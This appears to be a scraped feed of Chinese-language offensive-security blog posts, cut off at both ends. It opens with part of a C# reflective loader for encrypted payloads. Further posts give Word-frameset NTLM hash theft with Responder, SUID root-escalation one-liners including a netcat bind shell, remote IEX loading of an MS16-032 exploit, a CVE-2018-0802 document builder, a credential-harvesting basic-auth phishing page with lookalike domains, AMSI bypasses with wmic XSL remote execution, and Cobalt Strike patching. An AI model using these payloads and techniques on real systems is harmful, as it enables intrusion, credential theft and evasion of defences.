                        optionalHeader64 = FromBinaryReader<IMAGE_OPTIONAL_HEADER64>(reader);
                    }
    
                    imageSectionHeaders = new IMAGE_SECTION_HEADER[fileHeader.NumberOfSections];
                    for (int headerNo = 0; headerNo < imageSectionHeaders.Length; ++headerNo)
                    {
                        imageSectionHeaders[headerNo] = FromBinaryReader<IMAGE_SECTION_HEADER>(reader);
                    }
    
    
                    rawbytes = fileBytes;
    
                }
            }
    
    
            public static T FromBinaryReader<T>(BinaryReader reader)
            {
                // Read in a byte array
                byte[] bytes = reader.ReadBytes(Marshal.SizeOf(typeof(T)));
    
                // Pin the managed memory while, copy it out the data, then unpin it
                GCHandle handle = GCHandle.Alloc(bytes, GCHandleType.Pinned);
                T theStructure = (T)Marshal.PtrToStructure(handle.AddrOfPinnedObject(), typeof(T));
                handle.Free();
    
                return theStructure;
            }
    
    
    
            public bool Is32BitHeader
            {
                get
                {
                    UInt16 IMAGE_FILE_32BIT_MACHINE = 0x0100;
                    return (IMAGE_FILE_32BIT_MACHINE & FileHeader.Characteristics) == IMAGE_FILE_32BIT_MACHINE;
                }
            }
    
    
            public IMAGE_FILE_HEADER FileHeader
            {
                get
                {
                    return fileHeader;
                }
            }
    
    
            /// Gets the optional header
    
            public IMAGE_OPTIONAL_HEADER32 OptionalHeader32
            {
                get
                {
                    return optionalHeader32;
                }
            }
    
    
            /// Gets the optional header
    
            public IMAGE_OPTIONAL_HEADER64 OptionalHeader64
            {
                get
                {
                    return optionalHeader64;
                }
            }
    
            public IMAGE_SECTION_HEADER[] ImageSectionHeaders
            {
                get
                {
                    return imageSectionHeaders;
                }
            }
    
            public byte[] RawBytes
            {
                get
                {
                    return rawbytes;
                }
    
            }
    
        }//End Class
    
    
        unsafe class NativeDeclarations
        {
    
            public static uint MEM_COMMIT = 0x1000;
            public static uint MEM_RESERVE = 0x2000;
            public static uint PAGE_EXECUTE_READWRITE = 0x40;
            public static uint PAGE_READWRITE = 0x04;
    
            [StructLayout(LayoutKind.Sequential)]
            public unsafe struct IMAGE_BASE_RELOCATION
            {
                public uint VirtualAdress;
                public uint SizeOfBlock;
            }
    
            [DllImport("kernel32")]
            public static extern IntPtr VirtualAlloc(IntPtr lpStartAddr, uint size, uint flAllocationType, uint flProtect);
    
            [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
            public static extern IntPtr LoadLibrary(string lpFileName);
    
            [DllImport("kernel32.dll", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
            public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    
            [DllImport("kernel32")]
            public static extern IntPtr CreateThread(
    
              IntPtr lpThreadAttributes,
              uint dwStackSize,
              IntPtr lpStartAddress,
              IntPtr param,
              uint dwCreationFlags,
              IntPtr lpThreadId
              );
    
            [DllImport("kernel32")]
            public static extern UInt32 WaitForSingleObject(
    
              IntPtr hHandle,
              UInt32 dwMilliseconds
              );
    
            [StructLayout(LayoutKind.Sequential)]
            public unsafe struct IMAGE_IMPORT_DESCRIPTOR
            {
                public uint OriginalFirstThunk;
                public uint TimeDateStamp;
                public uint ForwarderChain;
                public uint Name;
                public uint FirstThunk;
            }
    
    
        }
    
        public class Misc
        {
            //Change This!
            private static readonly byte[] SALT = new byte[] { 0xba, 0xdc, 0x0f, 0xfe, 0xeb, 0xad, 0xbe, 0xfd, 0xea, 0xdb, 0xab, 0xef, 0xac, 0xe8, 0xac, 0xdc };
    
            public static void Stage(string fileName, string Key, string outFile)
            {
    
                byte[] raw = FileToByteArray(fileName);
                byte[] file = Encrypt(raw, Key);
    
                FileStream fileStream = File.Create(outFile);
    
                fileStream.Write(file, 0, file.Length);//Write stream to temp file
    
                //Console.WriteLine("File Ready, Now Deliver Payload");
    
            }
    
            public static byte[] FileToByteArray(string _FileName)
            {
                byte[] _Buffer = null;
                System.IO.FileStream _FileStream = new System.IO.FileStream(_FileName, System.IO.FileMode.Open, System.IO.FileAccess.Read);
                System.IO.BinaryReader _BinaryReader = new System.IO.BinaryReader(_FileStream);
                long _TotalBytes = new System.IO.FileInfo(_FileName).Length;
                _Buffer = _BinaryReader.ReadBytes((Int32)_TotalBytes);
                _FileStream.Close();
                _FileStream.Dispose();
                _BinaryReader.Close();
                return _Buffer;
            }
    
            public static byte[] Encrypt(byte[] plain, string password)
            {
                MemoryStream memoryStream;
                CryptoStream cryptoStream;
                Rijndael rijndael = Rijndael.Create();
                Rfc2898DeriveBytes pdb = new Rfc2898DeriveBytes(password, SALT);
                rijndael.Key = pdb.GetBytes(32);
                rijndael.IV = pdb.GetBytes(16);
                memoryStream = new MemoryStream();
                cryptoStream = new CryptoStream(memoryStream, rijndael.CreateEncryptor(), CryptoStreamMode.Write);
                cryptoStream.Write(plain, 0, plain.Length);
                cryptoStream.Close();
                return memoryStream.ToArray();
            }
            public static byte[] Decrypt(byte[] cipher, string password)
            {
                MemoryStream memoryStream;
                CryptoStream cryptoStream;
                Rijndael rijndael = Rijndael.Create();
                Rfc2898DeriveBytes pdb = new Rfc2898DeriveBytes(password, SALT);
                rijndael.Key = pdb.GetBytes(32);
                rijndael.IV = pdb.GetBytes(16);
                memoryStream = new MemoryStream();
                cryptoStream = new CryptoStream(memoryStream, rijndael.CreateDecryptor(), CryptoStreamMode.Write);
                cryptoStream.Write(cipher, 0, cipher.Length);
                cryptoStream.Close();
                return memoryStream.ToArray();
            }
    
            public static byte[] ReadFully(Stream input) //Returns Byte Array From Stream
            {
                byte[] buffer = new byte[16 * 1024];
                using (MemoryStream ms = new MemoryStream())
                {
                    int read;
                    while ((read = input.Read(buffer, 0, buffer.Length)) > 0)
                    {
                        ms.Write(buffer, 0, read);
                    }
                    return ms.ToArray();
                }
            }
    
        }//End Misc Class
    
        public class Package
        {
            public static string filex86 = @"INSERT B64 HERE";
            public static string filex64 = @"INSERT B64 HERE";
    
        }
    }
    

    之后对cs进行编译,生成key.snk :

    $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
    $Content = [System.Convert]::FromBase64String($key)
    Set-Content key.snk -Value $Content -Encoding Byte
    

    编译exe:

    C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /r:System.EnterpriseServices.dll /out:katz.exe /keyfile:key.snk /unsafe katz.cs
    

    编译以后可以直接运行,或者使用regsvcs.exe、regasm.exe、InstallUtil.exe来运行。

    1513688421587.png


    0 0

    之前有人总结了很多种窃取NTLM hash的方法,原文,译文。里面写的方法已经很多了,最近又学到了一个新的方法,所以在这里进行一下分享,也算是一个补充。

    历史上,Microsoft Word被用作HTML编辑器。这意味着它可以支持HTML元素,例如框架集。因此,可以将Microsoft Word文档与UNC路径链接起来,并将其与响应程序结合,以便从外部捕获NTLM哈希值。带有docx扩展名的Word文档实际上是一个包含各种XML文档的zip文件。这些XML文件正在控制主题,字体,文档的设置和Web设置。

    所以我们可以新建一个任意文档,并用压缩包来打开他。

    1513736341443.png

    word 目录下有一个webSettings.xml。我们对这个文件进行修改,添加以下代码则会创建与另外一个文件的链接。

    <w:frameset>
    <w:framesetSplitbar>
    <w:w w:val="60"/>
    <w:color w:val="auto"/>
    <w:noBorder/>
    </w:framesetSplitbar>
    <w:frameset>
    <w:frame>
    <w:name w:val="3"/>
    <w:sourceFileName r:id="rId1"/>
    <w:linkedToFile/>
    </w:frame>
    </w:frameset>
    </w:frameset>
    

    最终修改后的webSettings.xml如下:

    <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
    <w:webSettings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" mc:Ignorable="w14">
        <w:frameset>
    <w:framesetSplitbar>
    <w:w w:val="60"/>
    <w:color w:val="auto"/>
    <w:noBorder/>
    </w:framesetSplitbar>
    <w:frameset>
    <w:frame>
    <w:name w:val="3"/>
    <w:sourceFileName r:id="rId1"/>
    <w:linkedToFile/>
    </w:frame>
    </w:frameset>
    </w:frameset>
    <w:optimizeForBrowser/><w:allowPNG/></w:webSettings>
    

    现在我们把新的webSettings.xml替换原来的webSettings.xml,之后在word目录下的_rels目录创建一个新的文件 webSettings.xml.rels,文件内容如下:

    <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
    <Relationships
    xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
    <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="\\172.16.103.130\Updates.docx" TargetMode="External"/>
    </Relationships>
    

    在这里包含了UNC路径。指向我们的Responder。

    之后把文档重新命名为docx。开启Responder

    python Responder.py -I eth0 -wrf
    

    打开word,则可获取到hash

    1513737175195.png

    当然,使用DDE的方式以及CVE-2017-0199等其他的方式都是可以的。


    0 0
  • 12/19/17--19:49: SUID Privilege Escalation (chan 69772723)
  • Linux提权中,可以用的SUID文件来提权,SUID的作用就是:让本来没有相应权限的用户运行这个程序时,可以访问没有权限访问的资源。通常可以使用一下命令来找有SUID标志位的文件:

    find / -user root -perm -4000 -print 2>/dev/null
    find / -perm -u=s -type f 2>/dev/null
    find / -user root -perm -4000 -exec ls -ldb {} \;
    

    例如nmap

    ls -l /usr/bin/nmap
    -rwsr-xr-x 1 root root 780676 2008-04-08 10:04 /usr/bin/nmap
    

    存在s 则表示其存在SUID标志位,并拥有root的执行权限。以下是几类可用于提权的文件总结:

    1.Nmap

    老版本的nmap(2.02-5.21)有 interactive,是允许用户执行系统命令的。提权方式

    nmap --interactive
    

    之后执行命令:

    nmap> !sh
    sh-3.2# whoami
    root
    

    msf中的模块为:

    exploit/unix/local/setuid_nmap
    

    2.Find

    touch test
    find test -exec whoami \;
    

    如果服务器上装了nc,可以直接使用以下命令进行监听:

    find test -exec netcat -lvp 5555 -e /bin/sh \;
    

    之后进行连接:

    netcat 192.168.1.100 5555
    

    则可获取root shell

    3.vim/vi

    打开vim,按下ESC

    :set shell=/bin/sh
    :shell
    

    则可执行命令

    4.bash

    bash -p
    bash-3.2# id
    uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)
    

    5.less

    less /etc/passwd
    !/bin/sh
    

    6.more

    more /home/pelle/myfile
    !/bin/bash
    

    7.cp

    使用cp覆盖 /etc/shadow

    8.mv

    使用mv 覆盖 /etc/shadow 或者/etc/sudoers

    9.awk

    awk 'BEGIN {system("/bin/bash")}'
    

    10.man

    man passwd
    !/bin/bash
    

    11.python/perl/ruby/lua/etc

    perl

    exec "/bin/bash";
    

    python

    import os
    os.system("/bin/bash")
    

    12.tcpdump

    echo $'id\ncat /etc/shadow' > /tmp/.test
    chmod +x /tmp/.test
    sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
    

    欢迎补充。


    0 0

    有时候,使用某些exp进行提权的时候,exp可能会被查杀,当然,有源码的话,我们可以在源码上进行修改进行免杀处理,但是今天介绍的是另外一只方法,即使用PEloader来加载exp。
    powershell的PEloader在这里,查看代码我们可以看到,这个脚本使用非常简单,具体代码如下:

    $PEBytes = [IO.File]::ReadAllBytes('DemoEXE.exe')
    Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4"
    

    获取exp的字节流,之后再在内存中加载exp,所以思路也很简单,我们只需要把需要的exp转换成字符串,写入脚本,就可以构造一个powershell脚本。

    这里整理了一个脚本方便转换:

    function Convert-BinaryToString {
       [CmdletBinding()] param (
          [string] $FilePath
       )
       try {
          $ByteArray = [System.IO.File]::ReadAllBytes($FilePath);
       }
       catch {
          throw "Failed to read file. Ensure that you have permission to the file, and that the file path is correct.";
       }
       if ($ByteArray) {
          $Base64String = [System.Convert]::ToBase64String($ByteArray);
       }
       else {
          throw '$ByteArray is $null.';
       }
       $Base64String | set-content ("b64.txt")
    }
    

    使用zcgonvh的16032做演示。使用脚本转换:

    PS C:\Users\evi1cg\Desktop\16_032> . .\Convert-BinaryToString.ps1
    PS C:\Users\evi1cg\Desktop\16_032> Convert-BinaryToString -FilePath .\ms16-032_x64.exe
    

    生成base64的字符串并存储在b64.txt中。
    4B544212-75E6-4CAD-839C-18F77CA759EA.png

    使用如下命令进行转换:

    $InputString = "base64string"
    $PEBytes = [System.Convert]::FromBase64String($InputString)
    

    之后就可以使用

    Invoke-ReflectivePEInjection -PEBytes $PEBytes
    

    进行加载,最后分享一下最终的脚本:

    E2P_MS16-032.ps1

    使用方式为:

    E2P_MS16-032 -Command '"net user"'
    

    photo_2017-12-27_20-07-13.jpg

    脚本GITHUB:

    远程加载命令:

    powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/E2P_MS16-032.ps1');E2P_MS16-032 -Command '\"whoami\"'"
    

    717403C9-86AA-4594-A35F-9D0A1307088C.png


    0 0
  • 01/12/18--03:41: CVE-2018-0802利用 (chan 69772723)
  • 在CVE-2017-11882之后,2018年1月份又出了一个新的“噩梦公式二代”,在野样本嵌入了利用Nday漏洞和0day漏洞的2个公式对象同时进行攻击,Nday漏洞可以攻击未打补丁的系统,0day漏洞则攻击全补丁系统,绕过了CVE-2017-11882补丁的ASLR(地址随机化)安全保护措施,攻击最终将在用户电脑中植入恶意的远程控制程序。关于此漏洞的分析,可以看这里,今天看到在github公开了一个CVE-2018-0802的利用脚本,地址在这,为了达到最完美的利用,所以编写了RTF_11882_0802。

    GITHUB:
    此脚本集合了两个公式利用漏洞。

    利用方式与之前的方式一样。

    python RTF_11882_0802.py -c "cmd.exe /c calc.exe"  -i test.rtf -o test.doc
    

    其实就是简单粗暴的把两个公式编辑器插入文档中,一个是11882,一个是0802。

    “噩梦公式二代”(CVE-2018-0802)所使用的0day漏洞堪称CVE-2017-11882的双胞胎漏洞,攻击样本中的一个漏洞针对未打补丁前的系统,另外一个漏洞针对打补丁后的系统,利用两个OLE同时进行攻击,黑客精心构造的攻击完美兼容了系统漏洞补丁环境的不同情况。这个漏洞的利用技巧和Bypass ASLR的方式都带有一定的巧合性,假如EQNEDT32.EXE模块内没有一条满足条件的ret指令可以用来绕过ASLR,假如lpLogFont不是sub_21774的第一个参数,假如CVE-2017-11882的补丁修复方式强制开启了DEP保护,“噩梦公式二代”将没有可乘之机。

    解决方案

    一、及时更新补丁

    补丁下载地址:

    https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802

    二、通过注册表禁用此模块,可通过修改注册表,禁用以下COM控件的方式进行缓解,其中XX.X为版本号

    在运行中输入:

    reg add “HKLM\SOFTWARE\Microsoft\Office\XX.X\Common\COMCompatibility\{0002CE02-0000- 0000-C000-000000000046}” /v”Compatibility Flags” /t REG_DWORD /d 0×400
    
    reg add”HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\XX.X\Common\COMCompatibility\{0002CE02-0000-0000-C000-000000000046}” /v”Compatibility Flags” /t REG_DWORD /d 0×400
    

    注:此脚本只是为了安全研究,切勿非法使用!使用此脚本所造成的一切法律问题及后果,本站概不负责!


    0 0
  • 03/07/18--22:26: Hack with rewrite (chan 69772723)
  • 0x00 简介

    大家都知道apache,nginx等有rewrite的功能,通过rewrite规则可以把输入的URL转换成另一个URL,这是我们常见的一种需求,可以让我们的url变得更加简洁。但是其实这个功能也可被用于一些别的目的。下面就简单的介绍一下。

    0x01 后门

    关于通过配置文件做后门已经有很多文章有了介绍,即.htaccess.user.ini文件构造后门,关于.htaccess后门可以看这里,user.ini后门P牛也发过一篇文章,可以看这里,当然还有柠檬师傅的php.ini构成的后门。那么跟rewrite有什么关系呢。其实rewrite主要是为了逃避日志审查,通过rewrite,我们可以通过访问一个图片后缀的文件来执行我们的webshell,但是修改这些配置文件需要一定的权限。下面来进行一下简单的介绍。测试的时候主要是使用nginx,所以对nginx进行一下介绍,关于apache的配置有兴趣可以自己去查一波。下面是我的配置:
    ngingx.conf

    worker_processes  1;
    events {
        worker_connections  1024;
    }
    http {
        include       mime.types;
        default_type  application/octet-stream;
        sendfile        on;
        keepalive_timeout  65;
        include /usr/local/nginx/vhosts/*.conf;
        server {
            listen       80;
            server_name  localhost;
            location / {
                root   html;
                index  index.html index.htm;
            }
            error_page   500 502 503 504  /50x.html;
            location = /50x.html {
                root   html;
            }
        }
    }
    

    配置了多个域名的配置,所以针对某个域名的配置文件在vhosts里面,要配置的域名的配置文件:mydomain.conf

    server {
        listen 80;
        server_name  mydomain.com;
        root /www/mydomain;
        index index.html index.php;
        if ( $query_string ~* ".*[\;'\<\>].*" ){
            return 404;
        }
        location ~ .*\.(gif|jpg|jpeg|bmp|png|swf|flv|ico)$ {
            expires 30d;
        }
    
        location ~ .*\.(js|css)?$ {
            expires 7d;
        }
        location ~ \.php$ {
            fastcgi_pass   127.0.0.1:9000;
            fastcgi_index  index.php;
    
            include        fastcgi_params;
            #设置PATH_INFO并改写SCRIPT_FILENAME,SCRIPT_NAME服务器环境变量
            set $fastcgi_script_name2 $fastcgi_script_name;
            if ($fastcgi_script_name ~ "^(.+\.php)(/.+)$") {
                set $fastcgi_script_name2 $1;
                set $path_info $2;
            }
            fastcgi_param   PATH_INFO $path_info;
            fastcgi_param   SCRIPT_FILENAME   $document_root$fastcgi_script_name2;
            fastcgi_param   SCRIPT_NAME   $fastcgi_script_name2;
        }
    }
    

    要配置重定向很简单,只需要加入

        location ~ \.png$ {
        rewrite ^/img/test\.png$ /img/test.php last;
        }
    

    意思是匹配以png结尾的url,如果匹配到 img/test.png,则重定向到 img/test.php,所以,只需要在img目录下存放test.php,我们就可以通过访问 http://domain.com/img/test.png来访问。如下图:
    1520482949500.png

    关于更多匹配的规则,可以看这篇文章

    配置完需要重启nginx服务。

    0x02 基础认证钓鱼

    关于基础认证钓鱼,其实很早之前就已经有文章介绍过了,比如如何制作基础认证钓鱼页面。其实原理就是在页面中插入一个php的img,即:

    <img src="http://site.com/1.php"alt="Could not load image - Invalid credentils."/>>
    

    php的代码就是401的验证,当用户打开这个页面的时候,由于请求了http://site.com/1.php,所以会弹出验证的页面,用户输入账号密码之后,密码则会被攻击者记录。

    注:这种方法适用于Firefox和IE浏览器,Chrome并不会弹出基础认证窗口。

    为了让此攻击达到更好地隐蔽效果,我们可以使用rewrite来重写url。则使得访问的链接文件后缀为一个图片。为了达到更好地攻击效果,写了以下php代码:

    <?php
    $now = new DateTime();
    $user = isset($_SERVER['PHP_AUTH_USER']) ? $_SERVER['PHP_AUTH_USER'] : "";
    $pass = isset($_SERVER['PHP_AUTH_PW'])   ? $_SERVER['PHP_AUTH_PW']   : "";
    if ($user && $pass){
        $fp = fopen("count.txt", "a");
        $content = fread($fp);
        $ip = $_SERVER["REMOTE_ADDR"];
        $all = file_get_contents("count.txt");
        fwrite($fp, $now->format("Y-m-d H:i:s") . "\t" . $ip . "\t" . $user . ":" . $pass . "\n");
        $line = substr_count($all,$ip);
        fclose($fp);
    }
    if($line < 2){
        header('WWW-Authenticate: Basic realm="Corporate domain"');
    }else{
        header('content-type: image/png');
        echo file_get_contents("test.png");
    }
    ?>
    

    代码的功能就是弹出认证窗口,等待用户输入,并将输入的账号密码存到count.txt,如果此用户输入已达3次(一次输入可能是随便输入的账号密码),则输出正常图片。演示如下:

    4878.gif
    当然,你可以自己定义其他功能,比如将账号密码发送到邮箱等等。

    php代码写好了,怎么利用呢?
    其实我们要做到就是找各种编辑器,找那种可以远程插入图片的,然后插入我们的链接,如果网站直接把链接插入网站,那么在加载的时候,就会加载我们的验证页面。rewrite除了可以让后缀看起来是一个图片文件,其实还可以对一些编辑器进行绕过,比如插入远程图片的时候,编辑器对图片进行预览:

    1520488071492.png

    碰到这种情况,我们可以首先使用默认配置的nginx插入图片,如下图:

    1520488284941.png

    插入成功并提交以后,再重新修改rewrite。这样可以进行一些绕过。某种情景的攻击如下:
    demo:
    demo.gif

    为了达到更好地效果。攻击者可以注册一个看起来受信任的域名。比如说,如果攻击者的目标是targetdomain.com,那么他就可以注册如下的类似地址:

    targetdomain.co
    targetdomain.net
    target-domain.com
    targetdomain-oauth.com
    targetdomain-cdn.com
    targetdomain-images.com
    login-targetdomain.com
    

    0 0
  • 03/31/18--21:00: Cobalt strike3.8 中文支持 (chan 69772723)
  • 0x00 简介

    cobaltstrike3.10 已经出来很久了,其中最吸引人的可能就是他已经支持中文了,但是貌似很久以来都没在网上看到3.10的资源,所以就没办法,拿手上的3.8 改改将就用。

    0x01 反编译

    首先我们要对cobaltstrike3.8进行反编译,这里可以参照之前破解的方法,戳我,使用jad进行反编译。

    1522336230599.png

    0x02 修改代码

    要怎么定位到要改哪里呢?
    我们可以看一下CS的输出:

    1522336286954.png

    可以看到在输出之前有received output,所以我们就可以检索这个关键字,马上可以定位到BeaconC2.class文件,搜索“received output”一共有5个结果:

    1522336540818.png

    查看代码如下:

    1522336597408.png

    可以看到,输出的结果是由CommonUtils类的bString方法返回的,定位到CommonUtils.class文件查看代码:

    1522336678669.png

    可以看到传过来的数据使用 ISO8859-1 进行了编码。ISO8859-1属于单字节编码,最多能表示的字符范围是0-255,应用于英文系列。比如,字母a的编码为0x61=97。 很明显, ISO8859-1 编码表示的字符范围很窄,无法表示中文字符。这就是CS无法显示中文的原因。经过测试,使用 ISO8859-1 进行中间编码是不会导致数据丢失的。那么我们是不是可以修改代码把编码转过来来呢?当然可以 !

    但是由于自己比较菜,直接修改CommonUtils.java以后编译不过去(表示很难受,如果你会编译,还希望不吝赐教)。所以只能去修改BeaconC2.java。

    经过多次测试,发现在CS上执行命令以后返回的结果编码为GBK,所以转码过程为
    CommonUtils.java转码:

    GBK -> ISO8859-1
    

    我们要修改的BeaconC2.

    ISO8859-1 -> GBK -> UTF-8
    

    所以思路就很明朗了,我们只需要在传入rest之前把中文转换成UTF-8就可以了,代码也很简单,测试如下:

    1522337535419.png)

    所以关键代码为:

    String tmp = CommonUtils.bString(CommonUtils.readAll(in));
    String tmp1 = new String(tmp.getBytes("ISO8859-1"),"gbk");
    String rest = new String(tmp1.getBytes(),"utf-8");
    

    源代码是这样:

    1522337880400.png

    修改以后是这样:

    1522337852391.png

    所以找到所有的:

     String rest = CommonUtils.bString(CommonUtils.readAll(in));
    

    替换即可。

    0x03 编译替换

    修改以后,需要把BeaconC2.java编译之后替换原来的BeaconC2.class。编译方法很简单,只需要把BeaconC2.java放到解压以后的CS目录,执行以下命令:

    javac -classpath . BeaconC2.java -Xlint:unchecked
    

    在这里,可能会碰到以下报错

    1522338365724.png

    这里可以改一下代码,将

    import c2profile.MalleableHook.MyHook;
    import dns.DNSServer.Handler;
    

    改为:

    import c2profile.MalleableHook;
    import dns.DNSServer;
    

    在进行编译即可。之后将原来的BeaconC2.class替换,我们的CS就修改完成了。

    0x04 效果

    这里录了一个DEMO:

    CS.gif

    这里就不给CS了,分享一下改好的BeaconC2.class,用的时候只需要把CS用压缩包格式打开,直接替换beacon目录下的BeaconC2.class就好了。下载戳我


    0 0

    首先要下载 office2john.py,支持破解的加密为office自带的加密功能,即:
    83000-eyr1re7d788.png
    使用office2john将office转换为hash:

    python office2john.py 123.docx > hash.txt
    

    48261-cl8sxps7xum.png
    使用以下命令进行切割,转换成hashcat支持的形式:

    awk -F ":" '{print $2}' hash.txt > hashhc.txt
    

    06114-1kst5rl8a9g.png
    使用hashcat进行破解:

    hashcat -m 9500 hashhc.txt ~/wordlist/passwd.txt -o out.txt
    

    这里我使用了office2010,所以选择9500,要根据对应版本来选择

    选择版本可以使用 hashcat --help 来查看
    17293-xqb7bq65lso.png
    破解成功如下:
    56296-fi7e6sribvo.png


    0 0
  • 06/27/18--00:20: DotNetToJScript 复活之路 (chan 69772723)
  • 0x00 简介

    去年James Forshaw开源了一个工具DotNetToJScript,能够利用JS、Vbs等脚本加载.Net程序。再此工具发布以后,很多很多的工具也在此基础上产生,比如StarFightersCACTUSTORCHSharpShooter等等,基于脚本的攻击也随之越来越多,所以在win10中,微软引入了AMSI,并将基于DotNetToJScript的脚本特征加入到检测之列。并将此工具标记为恶意软件。如果直接运行通过DotNetToJScript生成的脚本,便会直接拦截,如下图
    1530067126795.png
    最近,学到了两种bypass的方式,所以进行一下分享。

    0x01 禁用AMSI

    这里讲的禁用AMSI并不需要高权限,只需要一个简单的Trick,这个是从这篇文章学来的,通过Process Monitor 进行查看,设置以下过滤器:
    1530067444682.png
    运行通过DotNetToJScript生成的脚本,可以监控到以下调用过程:
    1530067501155.png
    这里我们可以看到,在加载AMSI之前,查询了以下注册表键值HKCU\Software\Microsoft\Windows Script\Settings\AmsiEnable,尝试修改此键值为0:
    1530067589819.png
    再次运行脚本,可以看到shellcode成功执行了,如下图:
    bypass
    虽然修改注册表可以实现禁用AMSI,但是需要高权限,那怎样才可以在普通权限下禁用AMSI,其实通过@tiraniddo的文章我们可以看到,其实可以通过DLL劫持来进行绕过。通过Process Monitor可以看到检测过程中调用了C:\Windows\System32\amsi.dll,如果我们把cscript.exe 重命名成amsi.dll会怎么样呢?

    copy c:\windows\system32\cscript.exe amsi.dll
    amsi.dll evil.js
    

    dllhijack

    可以看到成功shellcode 成功执行了,修改过滤器如下:
    1530068708904.png
    我们来看一下调用过程
    1530068764803.png
    可以看到,现在已经没有调用C:\Windows\System32\amsi.dll,这也就让我们成功执行了我们的shellcode。

    0x02 利用wmic

    Casey Smith@subTee在博客分享的一个技巧,使用wmic能够从本地或从URL调用XSL(可扩展样式表语言)脚本。经过测试,通过此方式来调用DotNetToJScript的脚本也是可以成功执行的。subTee的文章在这。利用命令如下:

    #Local File
    wmic process list /FORMAT:evil.xsl
    #Remote File
    wmic os get /FORMAT:"https://example.com/evil.xsl"
    

    evil.xsl

    <?xml version='1.0'?>
    <stylesheet
    xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
    xmlns:user="placeholder"
    version="1.0">
    <output method="text"/>
        <ms:script implements-prefix="user" language="JScript">
        <![CDATA[
        var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
        ]]> </ms:script>
    </stylesheet>
    

    修改好的脚本,可以看这里:戳我
    使用一下命令则可执行shellcode

    wmic os get /FORMAT:"https://raw.githubusercontent.com/Ridter/AMSI_bypass/master/shellcode.xsl"
    

    但是使用wmic执行的时候会有一个问题,在powershell下执行会失败。如下图:
    1530081940192.png

    那么怎么调用呢?
    在读了mdsec的这篇文章以后,我们发现,其实是可以通过COM来调用的。用javascript写可以这样:

    var xml = new ActiveXObject("Microsoft.XMLDOM");
    xml.async = false;
    var xsl = xml;
    xsl.load("http://host/a.xsl");
    xml.transformNode(xsl);
    self.close();
    

    那这样我们就可以构造HTA来远程调用了。为了方便使用,我已经写好了一个aggressor脚本,地址:
    GITHUB:

    使用如下图:
    demo

    0x03参考

    https://tyranidslair.blogspot.com/2018/06/disabling-amsi-in-jscript-with-one.html
    https://subt0x11.blogspot.ca/2018/04/wmicexe-whitelisting-bypass-hacking.html?m=1
    https://www.mdsec.co.uk/2018/06/freestyling-with-sharpshooter-v1-0/


    0 0
  • 06/27/18--00:51: Cobal Strike 自定义OneLiner (chan 69772723)
  • 0x00 起因

    在使用Cobal Strike的过程中,我们可以看到里面已经集成了几种 Script Web Delivery,如下图:

    19484-drjxyu0m4wg.png

    而且在生成以后打开site,只需要点击Copy URL就可以把命令复制出来,再写aggressor脚本时也想要实现这个功能,发现copy以后只有url,并没有命令,所以为了一探究竟,还是把CS解压,grep了一把,定位到common.CommonUtils,发现了OneLiner方法:
    73927-nvotona7nxc.png

    所以要实现这个功能我们就需要对这个class进行修改,增加我们想要的命令。

    0x01 使用javassist修改class

    Javassist是一个能够操作字节码框架,通过它我们能很轻易的修改class代码。首先下载javassist ,新建一个java工程,右键工程导入javassist包。

    15585-gsx22q9953w.png

    我们可能常用mshta http://host/test.png 的方式来请求payload,可以使用一下代码进行添加:

    package changeclass;
    
    import java.io.IOException;
    
    import javassist.CannotCompileException;
    import javassist.ClassPool;
    import javassist.CtClass;
    import javassist.CtMethod;
    import javassist.NotFoundException;
    
    public class change {
            public static void main(String[] args) {
                updateMethod();
            }
            
            public static void updateMethod(){
                try {
                    ClassPool cPool = new ClassPool(true);
                        //如果该文件引入了其它类,需要利用类似如下方式声明
                    //cPool.importPackage("java.util.List");
                    
                    //设置cobaltstrike.jar文件的位置
